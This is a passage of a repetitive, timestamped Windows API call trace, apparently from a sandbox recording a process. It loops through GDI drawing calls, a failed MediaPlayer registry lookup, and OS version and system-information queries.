color=0x0) returned 0xffffffff [0017.443] BeginPath (hdc=0x0) returned 0 [0017.443] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.443] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.443] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.443] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.443] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.443] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.443] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.443] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.443] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xad04027d [0017.443] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb7040713 [0017.443] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408dd [0017.443] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408de [0017.443] CombineRgn (hrgnDst=0x10408dd, hrgnSrc1=0xad04027d, hrgnSrc2=0xb7040713, iMode=1) returned 1 [0017.443] CombineRgn (hrgnDst=0x10408de, hrgnSrc1=0xad04027d, hrgnSrc2=0xb7040713, iMode=4) returned 2 [0017.443] CreateSolidBrush (color=0xff) returned 0x21008dc [0017.443] CreateSolidBrush (color=0xff0000) returned 0x11008df [0017.443] DeleteObject (ho=0x11008df) returned 1 [0017.443] DeleteObject (ho=0xb7040713) returned 1 [0017.443] DeleteObject (ho=0xad04027d) returned 1 [0017.444] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.444] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.444] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.444] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.444] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.444] BeginPath (hdc=0x0) returned 0 [0017.444] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.444] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.444] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.444] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.444] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.444] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.444] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.444] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.444] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb8040713 [0017.444] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xae04027d [0017.444] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408e0 [0017.444] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408e1 [0017.444] CombineRgn (hrgnDst=0x10408e0, hrgnSrc1=0xb8040713, hrgnSrc2=0xae04027d, iMode=1) returned 1 [0017.444] CombineRgn (hrgnDst=0x10408e1, hrgnSrc1=0xb8040713, hrgnSrc2=0xae04027d, iMode=4) returned 2 [0017.444] CreateSolidBrush (color=0xff) returned 0x21008df [0017.444] CreateSolidBrush (color=0xff0000) returned 0x11008e2 [0017.444] DeleteObject (ho=0x11008e2) returned 1 [0017.444] DeleteObject (ho=0xae04027d) returned 1 [0017.444] DeleteObject (ho=0xb8040713) returned 1 [0017.444] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.444] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.445] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.445] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.445] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.445] BeginPath (hdc=0x0) returned 0 [0017.445] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.445] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.445] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.445] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.445] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.445] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.445] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.445] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.445] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xaf04027d [0017.445] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb9040713 [0017.445] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408e3 [0017.445] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408e4 [0017.445] CombineRgn (hrgnDst=0x10408e3, hrgnSrc1=0xaf04027d, hrgnSrc2=0xb9040713, iMode=1) returned 1 [0017.445] CombineRgn (hrgnDst=0x10408e4, hrgnSrc1=0xaf04027d, hrgnSrc2=0xb9040713, iMode=4) returned 2 [0017.445] CreateSolidBrush (color=0xff) returned 0x21008e2 [0017.445] CreateSolidBrush (color=0xff0000) returned 0x11008e5 [0017.445] DeleteObject (ho=0x11008e5) returned 1 [0017.445] DeleteObject (ho=0xb9040713) returned 1 [0017.445] DeleteObject (ho=0xaf04027d) returned 1 [0017.445] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.445] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.446] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.446] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.446] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.446] BeginPath (hdc=0x0) returned 0 [0017.446] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.446] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.446] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.446] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.446] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.446] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.446] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.446] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.446] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xba040713 [0017.446] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb004027d [0017.446] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408e6 [0017.446] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408e7 [0017.446] CombineRgn (hrgnDst=0x10408e6, hrgnSrc1=0xba040713, hrgnSrc2=0xb004027d, iMode=1) returned 1 [0017.446] CombineRgn (hrgnDst=0x10408e7, hrgnSrc1=0xba040713, hrgnSrc2=0xb004027d, iMode=4) returned 2 [0017.446] CreateSolidBrush (color=0xff) returned 0x21008e5 [0017.446] CreateSolidBrush (color=0xff0000) returned 0x11008e8 [0017.446] DeleteObject (ho=0x11008e8) returned 1 [0017.446] DeleteObject (ho=0xb004027d) returned 1 [0017.446] DeleteObject (ho=0xba040713) returned 1 [0017.446] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.446] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.446] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.446] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.446] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.447] BeginPath (hdc=0x0) returned 0 [0017.447] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.447] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.447] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.447] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.447] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.447] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.447] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.447] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.447] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb104027d [0017.447] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xbb040713 [0017.447] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408e9 [0017.447] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408ea [0017.447] CombineRgn (hrgnDst=0x10408e9, hrgnSrc1=0xb104027d, hrgnSrc2=0xbb040713, iMode=1) returned 1 [0017.447] CombineRgn (hrgnDst=0x10408ea, hrgnSrc1=0xb104027d, hrgnSrc2=0xbb040713, iMode=4) returned 2 [0017.447] CreateSolidBrush (color=0xff) returned 0x21008e8 [0017.447] CreateSolidBrush (color=0xff0000) returned 0x11008eb [0017.447] DeleteObject (ho=0x11008eb) returned 1 [0017.447] DeleteObject (ho=0xbb040713) returned 1 [0017.447] DeleteObject (ho=0xb104027d) returned 1 [0017.447] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.447] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.447] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.447] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.447] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.447] BeginPath (hdc=0x0) returned 0 [0017.447] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.447] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.447] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.447] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.447] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.448] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.448] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.448] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.448] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xbc040713 [0017.448] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb204027d [0017.448] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408ec [0017.448] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408ed [0017.448] CombineRgn (hrgnDst=0x10408ec, hrgnSrc1=0xbc040713, hrgnSrc2=0xb204027d, iMode=1) returned 1 [0017.448] CombineRgn (hrgnDst=0x10408ed, hrgnSrc1=0xbc040713, hrgnSrc2=0xb204027d, iMode=4) returned 2 [0017.448] CreateSolidBrush (color=0xff) returned 0x21008eb [0017.448] CreateSolidBrush (color=0xff0000) returned 0x11008ee [0017.448] DeleteObject (ho=0x11008ee) returned 1 [0017.448] DeleteObject (ho=0xb204027d) returned 1 [0017.448] DeleteObject (ho=0xbc040713) returned 1 [0017.448] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.448] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.448] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.448] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.448] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.448] BeginPath (hdc=0x0) returned 0 [0017.448] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.448] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.448] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.448] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.448] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.448] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.448] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.448] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.449] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb304027d [0017.449] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xbd040713 [0017.449] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408ef [0017.449] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408f0 [0017.449] CombineRgn (hrgnDst=0x10408ef, hrgnSrc1=0xb304027d, hrgnSrc2=0xbd040713, iMode=1) returned 1 [0017.449] CombineRgn (hrgnDst=0x10408f0, hrgnSrc1=0xb304027d, hrgnSrc2=0xbd040713, iMode=4) returned 2 [0017.449] CreateSolidBrush (color=0xff) returned 0x21008ee [0017.449] CreateSolidBrush (color=0xff0000) returned 0x11008f1 [0017.449] DeleteObject (ho=0x11008f1) returned 1 [0017.449] DeleteObject (ho=0xbd040713) returned 1 [0017.449] DeleteObject (ho=0xb304027d) returned 1 [0017.449] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.449] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.449] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.449] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.449] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.449] BeginPath (hdc=0x0) returned 0 [0017.449] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.449] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.449] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.449] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.449] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.449] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.449] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.449] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.449] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xbe040713 [0017.449] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb404027d [0017.449] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408f2 [0017.450] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408f3 [0017.450] CombineRgn (hrgnDst=0x10408f2, hrgnSrc1=0xbe040713, hrgnSrc2=0xb404027d, iMode=1) returned 1 [0017.450] CombineRgn (hrgnDst=0x10408f3, hrgnSrc1=0xbe040713, hrgnSrc2=0xb404027d, iMode=4) returned 2 [0017.450] CreateSolidBrush (color=0xff) returned 0x21008f1 [0017.450] CreateSolidBrush (color=0xff0000) returned 0x11008f4 [0017.450] DeleteObject (ho=0x11008f4) returned 1 [0017.450] DeleteObject (ho=0xb404027d) returned 1 [0017.450] DeleteObject (ho=0xbe040713) returned 1 [0017.450] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.450] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.450] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.450] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.450] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.450] BeginPath (hdc=0x0) returned 0 [0017.450] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.450] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.450] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.450] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.450] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.450] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.450] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.450] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.450] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb504027d [0017.450] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xbf040713 [0017.450] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408f5 [0017.450] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408f6 [0017.450] CombineRgn (hrgnDst=0x10408f5, hrgnSrc1=0xb504027d, hrgnSrc2=0xbf040713, iMode=1) returned 1 [0017.450] CombineRgn (hrgnDst=0x10408f6, hrgnSrc1=0xb504027d, hrgnSrc2=0xbf040713, iMode=4) returned 2 [0017.450] CreateSolidBrush (color=0xff) returned 0x21008f4 [0017.450] CreateSolidBrush (color=0xff0000) returned 0x11008f7 [0017.450] DeleteObject (ho=0x11008f7) returned 1 [0017.450] DeleteObject (ho=0xbf040713) returned 1 [0017.451] DeleteObject (ho=0xb504027d) returned 1 [0017.451] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.451] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.451] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.451] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.451] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.451] BeginPath (hdc=0x0) returned 0 [0017.451] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.451] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.451] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.451] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.451] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.451] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.451] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.451] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.451] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc0040713 [0017.451] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 